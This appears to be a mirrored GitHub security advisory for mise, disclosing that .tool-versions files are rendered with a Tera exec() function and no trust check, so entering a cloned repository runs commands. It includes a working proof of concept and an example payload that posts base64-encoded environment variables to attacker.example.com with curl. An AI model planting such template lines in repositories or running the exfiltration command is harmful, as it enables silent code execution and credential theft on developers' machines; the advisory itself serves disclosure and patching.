GHSA-FJJ5-V948-WHJJ

Vulnerability from github – Published: 2026-06-22 17:19 – Updated: 2026-06-22 17:19
VLAI
Summary
Mise Vulnerable to Arbitrary Code Execution via Tera Templates in .tool-versions Files (Trust Bypass)
Details

Summary

Mise processes .tool-versions files through the Tera template engine during parsing, with the exec() function registered, enabling arbitrary command execution. Unlike .mise.toml files, .tool-versions files are not subject to trust verification in non-paranoid mode. This means an attacker can place a malicious .tool-versions file in a git repository, and when a victim with mise activated cds into the directory, arbitrary commands execute without any trust prompt.

Vulnerability Details

Vulnerable Code

File: src/config/config_file/tool_versions.rs, lines 60-63

pub fn parse_str(s: &str, path: PathBuf) -> Result<Self> {
    let mut cf = Self::init(&path);
    let dir = path.parent();
    let s = get_tera(dir).render_str(s, &cf.context)?;  // <-- No trust check
    // ...
}

File: src/tera.rs, lines 385-391

pub fn get_tera(dir: Option<&Path>) -> Tera {
    let mut tera = TERA.clone();
    let dir = dir.map(PathBuf::from);
    tera.register_function("exec", tera_exec(dir.clone(), env::PRISTINE_ENV.clone()));
    tera.register_function("read_file", tera_read_file(dir));
    tera
}

File: src/tera.rs, lines 394-452 -- tera_exec passes the command argument to a shell for execution with no restrictions.

File: src/config/config_file/mod.rs, lines 272-287

pub async fn parse(path: &Path) -> Result<Arc<dyn ConfigFile>> {
    if let Ok(settings) = Settings::try_get()
        && settings.paranoid
    {
        trust_check(path)?;  // Only in paranoid mode!
    }
    match detect_config_file_type(path).await {
        // ...
        Some(ConfigFileType::ToolVersions) => Ok(Arc::new(ToolVersions::from_file(path)?)),
        // ...
    }
}

Attack Vector

  1. An attacker creates a .tool-versions file in a git repository containing Tera template syntax with the exec() function.
  2. The victim clones the repository and has mise activated in their shell (via eval "$(mise activate zsh)" or equivalent).
  3. When the victim cds into the repository directory, mise's shell hook (hook-env) fires automatically.
  4. hook-env loads and parses config files, including .tool-versions.
  5. During parsing, ToolVersions::parse_str processes the file content through get_tera(dir).render_str().
  6. The Tera engine evaluates {{ exec(command="...") }}, executing arbitrary commands as the victim's user.
  7. No trust prompt is displayed because trust_check is not called for .tool-versions files in non-paranoid mode.

Execution Context

  • Commands execute as the current user with full access to their environment.
  • The pristine environment (env::PRISTINE_ENV) is passed to the executed command, which includes all of the user's environment variables (potentially including tokens, credentials, SSH agents, etc.).
  • Execution happens silently during the prompt hook -- the user sees no indication that code was run.

Contrast with .mise.toml

.mise.toml files are protected: MiseToml::from_str() calls trust_check(path) before any parsing occurs (line 213 of mise_toml.rs). During hook-env, untrusted .mise.toml files fail to parse with an UntrustedConfig error, preventing any code execution. .tool-versions files lack this protection entirely.

Steps to Reproduce

Prerequisites

  • mise installed (brew install mise or equivalent)
  • Shell activation enabled: eval "$(mise activate zsh)" (or bash/fish)
  • Default settings (paranoid mode NOT enabled — this is the default)

PoC: Silent RCE on cd

Step 1: Create a directory simulating a cloned repository with a malicious .tool-versions:

mkdir -p /tmp/poc-mise-repo
cd /tmp/poc-mise-repo
git init

cat > .tool-versions << 'EOF'
{{ exec(command="id > /tmp/mise-rce-proof && echo SUCCESS=$(whoami) >> /tmp/mise-rce-proof && date >> /tmp/mise-rce-proof") }}node 20.0.0
python 3.11.0
EOF

git add -A && git commit -m "Initial commit"

Note: The exec() output is concatenated with node so the resulting line parses as a valid tool-versions entry. The payload redirects all output to a file, producing no stdout — the exec() returns an empty string, making the line evaluate to node 20.0.0.

Step 2: In a new shell with mise activated, enter the directory:

eval "$(mise activate zsh)"
cd /tmp/poc-mise-repo

Step 3: Verify arbitrary code execution:

cat /tmp/mise-rce-proof

Expected output:

uid=501(youruser) gid=20(staff) groups=20(staff),...
SUCCESS=youruser
Mon Mar 16 21:34:46 IST 2026

No trust prompt, no warning, no error output. The id command executed silently as the current user.

Validated Test Results

Tested on 2026-03-16 with: - mise 2026.3.9 macos-arm64 - macOS Darwin 24.5.0 arm64 - zsh 5.9 - Paranoid mode: false (default)

Test 1 — .tool-versions (no trust check):

$ rm -f /tmp/mise-rce-proof
$ zsh -c 'eval "$(mise activate zsh)" && cd /tmp/poc-mise-repo && pwd'
/tmp/poc-mise-repo
$ cat /tmp/mise-rce-proof
uid=501(golan) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),...
SUCCESS=golan
Mon Mar 16 21:34:46 IST 2026

Command executed silently. No trust prompt. No errors.

Test 2 — .mise.toml with same payload (trust check blocks execution):

$ mkdir -p /tmp/poc-mise-toml
$ cat > /tmp/poc-mise-toml/.mise.toml << 'TOMLEOF'
[tools]
node = "{{ exec(command='id > /tmp/mise-hook-pwned') }}20.0.0"
TOMLEOF
$ rm -f /tmp/mise-hook-pwned
$ zsh -c 'eval "$(mise activate zsh)" && cd /tmp/poc-mise-toml && pwd'
mise ERROR Config files in /private/tmp/poc-mise-toml/.mise.toml are not trusted.
Trust them with `mise trust`. See https://mise.jdx.dev/cli/trust.html
$ cat /tmp/mise-hook-pwned
cat: /tmp/mise-hook-pwned: No such file or directory

.mise.toml correctly blocked by trust verification. .tool-versions bypasses it entirely.

Alternative PoC (data exfiltration)

{{ exec(command="curl -s -X POST -d \"$(env | base64)\" https://attacker.example.com/collect -o /dev/null") }}python 3.11.0

Impact

  • Arbitrary code execution on any machine where a user with mise activated enters a directory containing a malicious .tool-versions file.
  • Supply chain attack vector: .tool-versions is a widely-used convention from asdf-vm and is commonly committed to repositories. Developers expect it to contain only tool names and versions, not executable content.
  • Silent execution: No trust prompt, warning, or user interaction required.
  • Full user privilege escalation: Commands run with the full privileges and environment of the current user.
  • Credential theft: The user's full environment (including tokens, API keys, SSH agent) is available to the executed command.
  • Widespread potential impact: Any open-source project with a .tool-versions file could be targeted. A malicious PR adding tera syntax to an existing .tool-versions file could execute code on all reviewers' machines.

Suggested Fix

Option 1: Add trust_check to .tool-versions parsing (recommended)

// In src/config/config_file/tool_versions.rs
pub fn from_file(path: &Path) -> Result<Self> {
    trace!("parsing tool-versions: {}", path.display());
    Self::parse_str(&file::read_to_string(path)?, path.to_path_buf())
}

pub fn parse_str(s: &str, path: PathBuf) -> Result<Self> {
    let mut cf = Self::init(&path);
    let dir = path.parent();
    // Only use tera if the file contains template syntax AND is trusted
    let s = if s.contains("{{") || s.contains("{%") || s.contains("{#") {
        trust_check(&path)?;
        get_tera(dir).render_str(s, &cf.context)?
    } else {
        s.to_string()
    };
    // ...
}

Option 2: Remove exec() from .tool-versions tera context

Create a separate get_tera_safe() that does not register the exec function, and use it for .tool-versions parsing.

Option 3: Remove tera processing from .tool-versions entirely

.tool-versions is an asdf-compatible format that historically does not support templates. Removing tera from its parsing would be the safest approach and most consistent with user expectations.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "mise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.3.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33646"
  ],
  "database_specific": {
    "cwe_ids": [],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-22T17:19:56Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nMise processes `.tool-versions` files through the Tera template engine during parsing, with the `exec()` function registered, enabling arbitrary command execution. Unlike `.mise.toml` files, `.tool-versions` files are **not subject to trust verification** in non-paranoid mode. This means an attacker can place a malicious `.tool-versions` file in a git repository, and when a victim with mise activated `cd`s into the directory, arbitrary commands execute without any trust prompt.\n\n## Vulnerability Details\n\n### Vulnerable Code\n\n**File:** `src/config/config_file/tool_versions.rs`, lines 60-63\n\n```rust\npub fn parse_str(s: \u0026str, path: PathBuf) -\u003e Result\u003cSelf\u003e {\n    let mut cf = Self::init(\u0026path);\n    let dir = path.parent();\n    let s = get_tera(dir).render_str(s, \u0026cf.context)?;  // \u003c-- No trust check\n    // ...\n}\n```\n\n**File:** `src/tera.rs`, lines 385-391\n\n```rust\npub fn get_tera(dir: Option\u003c\u0026Path\u003e) -\u003e Tera {\n    let mut tera = TERA.clone();\n    let dir = dir.map(PathBuf::from);\n    tera.register_function(\"exec\", tera_exec(dir.clone(), env::PRISTINE_ENV.clone()));\n    tera.register_function(\"read_file\", tera_read_file(dir));\n    tera\n}\n```\n\n**File:** `src/tera.rs`, lines 394-452 -- `tera_exec` passes the `command` argument to a shell for execution with no restrictions.\n\n**File:** `src/config/config_file/mod.rs`, lines 272-287\n\n```rust\npub async fn parse(path: \u0026Path) -\u003e Result\u003cArc\u003cdyn ConfigFile\u003e\u003e {\n    if let Ok(settings) = Settings::try_get()\n        \u0026\u0026 settings.paranoid\n    {\n        trust_check(path)?;  // Only in paranoid mode!\n    }\n    match detect_config_file_type(path).await {\n        // ...\n        Some(ConfigFileType::ToolVersions) =\u003e Ok(Arc::new(ToolVersions::from_file(path)?)),\n        // ...\n    }\n}\n```\n\n### Attack Vector\n\n1. An attacker creates a `.tool-versions` file in a git repository containing Tera template syntax with the `exec()` function.\n2. The victim clones the repository and has mise activated in their shell (via `eval \"$(mise activate zsh)\"` or equivalent).\n3. When the victim `cd`s into the repository directory, mise\u0027s shell hook (`hook-env`) fires automatically.\n4. `hook-env` loads and parses config files, including `.tool-versions`.\n5. During parsing, `ToolVersions::parse_str` processes the file content through `get_tera(dir).render_str()`.\n6. The Tera engine evaluates `{{ exec(command=\"...\") }}`, executing arbitrary commands as the victim\u0027s user.\n7. No trust prompt is displayed because `trust_check` is not called for `.tool-versions` files in non-paranoid mode.\n\n### Execution Context\n\n- Commands execute as the current user with full access to their environment.\n- The pristine environment (`env::PRISTINE_ENV`) is passed to the executed command, which includes all of the user\u0027s environment variables (potentially including tokens, credentials, SSH agents, etc.).\n- Execution happens silently during the prompt hook -- the user sees no indication that code was run.\n\n### Contrast with .mise.toml\n\n`.mise.toml` files are protected: `MiseToml::from_str()` calls `trust_check(path)` before any parsing occurs (line 213 of `mise_toml.rs`). During `hook-env`, untrusted `.mise.toml` files fail to parse with an `UntrustedConfig` error, preventing any code execution. `.tool-versions` files lack this protection entirely.\n\n## Steps to Reproduce\n\n### Prerequisites\n\n- mise installed (`brew install mise` or equivalent)\n- Shell activation enabled: `eval \"$(mise activate zsh)\"` (or bash/fish)\n- Default settings (paranoid mode NOT enabled \u2014 this is the default)\n\n### PoC: Silent RCE on `cd`\n\n**Step 1:** Create a directory simulating a cloned repository with a malicious `.tool-versions`:\n\n```bash\nmkdir -p /tmp/poc-mise-repo\ncd /tmp/poc-mise-repo\ngit init\n\ncat \u003e .tool-versions \u003c\u003c \u0027EOF\u0027\n{{ exec(command=\"id \u003e /tmp/mise-rce-proof \u0026\u0026 echo SUCCESS=$(whoami) \u003e\u003e /tmp/mise-rce-proof \u0026\u0026 date \u003e\u003e /tmp/mise-rce-proof\") }}node 20.0.0\npython 3.11.0\nEOF\n\ngit add -A \u0026\u0026 git commit -m \"Initial commit\"\n```\n\nNote: The `exec()` output is concatenated with `node` so the resulting line parses as a valid tool-versions entry. The payload redirects all output to a file, producing no stdout \u2014 the `exec()` returns an empty string, making the line evaluate to `node 20.0.0`.\n\n**Step 2:** In a new shell with mise activated, enter the directory:\n\n```bash\neval \"$(mise activate zsh)\"\ncd /tmp/poc-mise-repo\n```\n\n**Step 3:** Verify arbitrary code execution:\n\n```bash\ncat /tmp/mise-rce-proof\n```\n\n**Expected output:**\n```\nuid=501(youruser) gid=20(staff) groups=20(staff),...\nSUCCESS=youruser\nMon Mar 16 21:34:46 IST 2026\n```\n\nNo trust prompt, no warning, no error output. The `id` command executed silently as the current user.\n\n### Validated Test Results\n\nTested on 2026-03-16 with:\n- mise 2026.3.9 macos-arm64\n- macOS Darwin 24.5.0 arm64\n- zsh 5.9\n- Paranoid mode: `false` (default)\n\n**Test 1 \u2014 `.tool-versions` (no trust check):**\n```\n$ rm -f /tmp/mise-rce-proof\n$ zsh -c \u0027eval \"$(mise activate zsh)\" \u0026\u0026 cd /tmp/poc-mise-repo \u0026\u0026 pwd\u0027\n/tmp/poc-mise-repo\n$ cat /tmp/mise-rce-proof\nuid=501(golan) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),...\nSUCCESS=golan\nMon Mar 16 21:34:46 IST 2026\n```\n\nCommand executed silently. No trust prompt. No errors.\n\n**Test 2 \u2014 `.mise.toml` with same payload (trust check blocks execution):**\n```\n$ mkdir -p /tmp/poc-mise-toml\n$ cat \u003e /tmp/poc-mise-toml/.mise.toml \u003c\u003c \u0027TOMLEOF\u0027\n[tools]\nnode = \"{{ exec(command=\u0027id \u003e /tmp/mise-hook-pwned\u0027) }}20.0.0\"\nTOMLEOF\n$ rm -f /tmp/mise-hook-pwned\n$ zsh -c \u0027eval \"$(mise activate zsh)\" \u0026\u0026 cd /tmp/poc-mise-toml \u0026\u0026 pwd\u0027\nmise ERROR Config files in /private/tmp/poc-mise-toml/.mise.toml are not trusted.\nTrust them with `mise trust`. See https://mise.jdx.dev/cli/trust.html\n$ cat /tmp/mise-hook-pwned\ncat: /tmp/mise-hook-pwned: No such file or directory\n```\n\n`.mise.toml` correctly blocked by trust verification. `.tool-versions` bypasses it entirely.\n\n### Alternative PoC (data exfiltration)\n\n```\n{{ exec(command=\"curl -s -X POST -d \\\"$(env | base64)\\\" https://attacker.example.com/collect -o /dev/null\") }}python 3.11.0\n```\n\n## Impact\n\n- **Arbitrary code execution** on any machine where a user with mise activated enters a directory containing a malicious `.tool-versions` file.\n- **Supply chain attack vector**: `.tool-versions` is a widely-used convention from asdf-vm and is commonly committed to repositories. Developers expect it to contain only tool names and versions, not executable content.\n- **Silent execution**: No trust prompt, warning, or user interaction required.\n- **Full user privilege escalation**: Commands run with the full privileges and environment of the current user.\n- **Credential theft**: The user\u0027s full environment (including tokens, API keys, SSH agent) is available to the executed command.\n- **Widespread potential impact**: Any open-source project with a `.tool-versions` file could be targeted. A malicious PR adding tera syntax to an existing `.tool-versions` file could execute code on all reviewers\u0027 machines.\n\n## Suggested Fix\n\n### Option 1: Add trust_check to .tool-versions parsing (recommended)\n\n```rust\n// In src/config/config_file/tool_versions.rs\npub fn from_file(path: \u0026Path) -\u003e Result\u003cSelf\u003e {\n    trace!(\"parsing tool-versions: {}\", path.display());\n    Self::parse_str(\u0026file::read_to_string(path)?, path.to_path_buf())\n}\n\npub fn parse_str(s: \u0026str, path: PathBuf) -\u003e Result\u003cSelf\u003e {\n    let mut cf = Self::init(\u0026path);\n    let dir = path.parent();\n    // Only use tera if the file contains template syntax AND is trusted\n    let s = if s.contains(\"{{\") || s.contains(\"{%\") || s.contains(\"{#\") {\n        trust_check(\u0026path)?;\n        get_tera(dir).render_str(s, \u0026cf.context)?\n    } else {\n        s.to_string()\n    };\n    // ...\n}\n```\n\n### Option 2: Remove exec() from .tool-versions tera context\n\nCreate a separate `get_tera_safe()` that does not register the `exec` function, and use it for `.tool-versions` parsing.\n\n### Option 3: Remove tera processing from .tool-versions entirely\n\n`.tool-versions` is an asdf-compatible format that historically does not support templates. Removing tera from its parsing would be the safest approach and most consistent with user expectations.",
  "id": "GHSA-fjj5-v948-whjj",
  "modified": "2026-06-22T17:19:56Z",
  "published": "2026-06-22T17:19:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/jdx/mise/security/advisories/GHSA-fjj5-v948-whjj"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jdx/mise"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mise Vulnerable to Arbitrary Code Execution via Tera Templates in .tool-versions Files (Trust Bypass)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…